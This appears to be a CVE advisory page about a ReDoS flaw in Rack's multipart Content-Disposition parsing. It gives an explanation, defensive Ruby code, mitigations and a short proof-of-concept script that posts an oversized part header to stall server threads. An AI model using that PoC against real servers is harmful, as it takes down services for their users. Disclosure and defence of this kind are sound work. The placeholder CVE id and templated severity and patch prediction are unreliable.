Ruby on Rails (Rack), ReDoS Vulnerability, CVE-2025-XXXXX (Critical)


How the CVE Works

The vulnerability is in Rack's `multipart.rb`, specifically the `handle_mime_head` method that parses the Content-Disposition header of each part in a multipart/form-data body. The parameter values in that header (`name`, `filename`, and the `utf-8''`-prefixed extended filename form) are extracted with a regular expression that is susceptible to catastrophic backtracking. The attacker does not send a regex: a single part header with very long `name` and extended `filename` values is enough to make Rack's matcher backtrack exponentially, pinning a CPU core. Because Rack parses the body synchronously on the request thread, that thread stalls for the duration of the match, and enough such requests exhaust the server's worker pool, a ReDoS (Regular Expression Denial of Service). The root cause is a backtracking-prone regex applied to attacker-controlled input of unbounded length, the same bug class as CVE-2022-44571 in the same parser, reached through a different header shape.
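What a linear-time version of that parse step looks like, as an added example that is not Rack's code and does not reproduce Rack's actual regex: the parser below walks a part's Content-Disposition value once, handles quoted strings with backslash escapes and the `utf-8''` extended filename form, and refuses a header over an assumed cap before doing any work on it. `MAX_HEADER_LENGTH`, `HeaderTooLong` and the function names are choices made for this example, not anything Rack defines.

```ruby
# Added example, not Rack's code: a single-pass parser for a part's
# Content-Disposition header. Every loop below advances through the input
# exactly once, so a 5000-character filename costs ~5000 steps rather than
# the backtracking a nested-quantifier regex would do on the same bytes.
MAX_HEADER_LENGTH = 8192 # assumed cap on one part header; tune to your upload policy

class HeaderTooLong < StandardError; end

# 'form-data; name="f"; filename*=utf-8''r%C3%A9sum%C3%A9.pdf' becomes
# { disposition: "form-data", "name" => "f", "filename*" => ..., "filename" => "résumé.pdf" }
def parse_content_disposition(value)
  raise HeaderTooLong, "#{value.bytesize} bytes" if value.bytesize > MAX_HEADER_LENGTH

  params = {}
  fields = split_outside_quotes(value, ';')
  params[:disposition] = fields.shift.to_s.strip.downcase
  fields.each do |field|
    eq = field.index('=')
    next if eq.nil?                          # bare token without a value: ignore
    key = field[0...eq].strip.downcase
    raw = field[(eq + 1)..].strip
    params[key] = raw.start_with?('"') ? unquote(raw) : raw
  end
  decode_extended_filename(params)
  params
end

# Split on `sep` outside quoted-strings, honouring backslash escapes inside them.
def split_outside_quotes(str, sep)
  out, buf, in_quotes, escaped = [], +'', false, false
  str.each_char do |ch|
    if escaped
      buf << ch
      escaped = false
    elsif in_quotes && ch == '\\'
      buf << ch
      escaped = true
    elsif ch == '"'
      buf << ch
      in_quotes = !in_quotes
    elsif ch == sep && !in_quotes
      out << buf
      buf = +''
    else
      buf << ch
    end
  end
  out << buf
end

# Drop the surrounding quotes and resolve \" and \\ escapes.
def unquote(raw)
  inner = raw.length >= 2 && raw.end_with?('"') ? raw[1...-1] : raw[1..]
  inner.gsub(/\\(.)/, '\1')
end

# RFC 5987 form: filename*=charset'language'percent-encoded-bytes.
# Only utf-8 is decoded; other charsets are left as the raw value.
def decode_extended_filename(params)
  ext = params['filename*']
  return unless ext
  charset, _lang, encoded = ext.split("'", 3)
  return unless charset&.casecmp?('utf-8') && encoded
  bytes = encoded.b.gsub(/%([0-9A-Fa-f]{2})/) { [$1].pack('H2') }
  params['filename'] = bytes.force_encoding(Encoding::UTF_8)
end
```

The two small regexes that remain (`/\\(.)/` and the percent-escape) have no nested quantifiers, so their cost is proportional to the input; the length check in front of everything is what turns "unbounded attacker input" into a bounded amount of work per request.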

DailyCVE Form

Platform: Ruby on Rails (Rack)
Version: <3.0.0, >2.2.0
Vulnerability: ReDoS
Severity: Critical
Date: 2025-06-05

Prediction: Patch by 2025-06-20

What Undercode Say:

Analytics:

  • Affects Rack-based apps (Rails included) that parse multipart/form-data bodies, i.e. anything accepting file uploads or multipart forms
  • One malicious request stalls one server thread; a handful exhaust the worker pool
  • CPU for the stalled thread sits at 100% for the duration of the match

Exploit (PoC):

require 'net/http'
require 'uri'

boundary = 'redos'
# One part whose header carries very long name and filename* values
part_header = "Content-Disposition: form-data; name=\"#{'a' * 1000}!\"; filename*=utf-8''#{'x' * 5000}"
body = "--#{boundary}\r\n#{part_header}\r\n\r\npayload\r\n--#{boundary}--\r\n"

uri = URI('http://victim/target')
http = Net::HTTP.new(uri.host, uri.port)
request = Net::HTTP::Post.new(uri)
request['Content-Type'] = "multipart/form-data; boundary=#{boundary}"
request.body = body
http.request(request)

Protection:

1. Immediate mitigation: upgrade Rack to the patched release (>= 3.0.0 per the affected range above; confirm the exact version against the upstream advisory). In a Bundler-managed app a global gem install changes nothing, so pin it in the Gemfile and update the lock file:

gem 'rack', '>= 3.0.0'   # Gemfile
bundle update rack

2. Nginx rate limiting. A single request is enough to stall a thread, so this only bounds how many stalled threads one client can create per second; the zone does nothing on its own and must be applied with limit_req in the location that proxies to Rack (cap the multipart body with client_max_body_size there as well):

limit_req_zone $binary_remote_addr zone=rackdos:10m rate=5r/s;
limit_req zone=rackdos burst=10 nodelay;   # inside the location that proxies to Rack

3. Rack monkey-patch (a stopgap until the upgrade). The original `handle_mime_head` has to be kept under another name so the wrapper can call it. Note that Timeout can only fire when the regex engine yields back to the VM, which a catastrophically backtracking match may never do; on Ruby >= 3.2 set `Regexp.timeout = 1.0` (a process-wide match deadline) rather than relying on this wrapper:

require 'timeout'

Rack::Multipart::Parser.class_eval do
  alias_method :handle_mime_head_without_limit, :handle_mime_head

  # Bound the wall time spent on one part header; raises Timeout::Error
  def handle_mime_head(*args, &block)
    Timeout.timeout(0.5) { handle_mime_head_without_limit(*args, &block) }
  end
end

4. WAF rule (ModSecurity). The Content-Disposition that matters is a part header inside the multipart body, not a request header, so a phase:1 REQUEST_HEADERS rule never sees it, and "@rx .{2,}" would deny any request carrying a two-character Content-Disposition header. ModSecurity parses the multipart body itself and exposes field names and file names as collections, so bound those instead (body inspection must be on; 1024 is a tuning value, and an extended filename* value is not guaranteed to appear in these collections, so treat this as reducing exposure rather than closing the hole):

SecRequestBodyAccess On
SecRule ARGS_NAMES|FILES_NAMES|FILES "@rx ^.{1024,}$" \
"id:1005,phase:2,deny,status:400,msg:'Oversized multipart field or file name'"

5. Monitoring command. A stalled regex match writes nothing to the log by itself, so pair the log grep with the application server's CPU and uptime (Puma assumed below; the log path is an assumption, Rails' default is log/production.log under the app root):

watch -n 1 "grep 'Rack::Multipart' /var/log/rails/production.log | tail -20; ps -C puma -o pid,pcpu,etime,args"
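Items 3 and 4 above both try to keep an oversized Content-Disposition away from the vulnerable regex. A more direct form of that idea, as an added example that is neither Rack's nor this page's code, is a Rack middleware that buffers the multipart body (up to an assumed cap), rejects any part-header line over an assumed byte limit, and only then lets Rack::Multipart parse it. `MultipartHeaderGuard`, `multipart_env`, `GUARDED_APP` and both limits are names and values chosen for the example; the multipart bodies in it are constructed test input.

```ruby
require 'stringio'

# Added example, not Rack's own code: a middleware that refuses a multipart
# body containing an over-long part header before Rack::Multipart ever runs a
# regex on it. It reads the body once (bounded), scans part headers with a
# plain byte walk, then hands the parser a rewound copy. Both limits are
# assumed values to tune per deployment.
class MultipartHeaderGuard
  MAX_PART_HEADER = 4096             # assumed cap per part-header line (bytes)
  MAX_BODY        = 16 * 1024 * 1024 # assumed cap on bodies we will buffer

  def initialize(app, max_header: MAX_PART_HEADER, max_body: MAX_BODY)
    @app, @max_header, @max_body = app, max_header, max_body
  end

  def call(env)
    boundary = boundary_of(env['CONTENT_TYPE'])
    return @app.call(env) unless boundary

    body = env['rack.input'].read(@max_body + 1) || ''
    if body.bytesize > @max_body || oversized_part_header?(body, boundary)
      return [413, { 'content-type' => 'text/plain' }, ['multipart part header too long']]
    end

    env['rack.input'] = StringIO.new(body)   # the downstream parser reads from the start
    @app.call(env)
  end

  private

  # Pull boundary=... out of "multipart/form-data; boundary=xyz" (quoted or bare).
  def boundary_of(content_type)
    type, *params = content_type.to_s.split(';').map(&:strip)
    return nil unless type&.downcase&.start_with?('multipart/')
    params.each do |param|
      key, val = param.split('=', 2)
      return val.delete_prefix('"').delete_suffix('"') if key&.casecmp?('boundary') && val
    end
    nil
  end

  # Lines between a boundary delimiter and the next blank line are part headers.
  def oversized_part_header?(body, boundary)
    delimiter = "--#{boundary}".b
    in_headers = false
    body.each_line("\r\n") do |line|
      line = line.chomp("\r\n")
      if line.start_with?(delimiter)
        in_headers = true                      # new part: headers follow
      elsif in_headers && line.empty?
        in_headers = false                     # blank line: part body follows
      elsif in_headers && line.bytesize > @max_header
        return true
      end
    end
    false
  end
end

# Builds a Rack env around a constructed multipart body (test input, not real traffic).
def multipart_env(part_headers, boundary: 'guard')
  body = part_headers.map { |head| "--#{boundary}\r\n#{head}\r\n\r\npayload\r\n" }.join
  body << "--#{boundary}--\r\n"
  {
    'REQUEST_METHOD' => 'POST',
    'CONTENT_TYPE'   => "multipart/form-data; boundary=#{boundary}",
    'rack.input'     => StringIO.new(body)
  }
end

# Stand-in downstream app: echoes how many body bytes it could still read.
GUARDED_APP = MultipartHeaderGuard.new(
  ->(env) { [200, { 'content-type' => 'text/plain' }, [env['rack.input'].read.bytesize.to_s]] }
)
```

In a Rails or Rack app this goes in config.ru as `use MultipartHeaderGuard` ahead of the application so it runs before Rack::Multipart. The cost is that the body is buffered in memory up to `MAX_BODY`, so the cap has to sit at or below what the server already accepts; the guard limits the damage one request can do but does not replace the upgrade.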

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
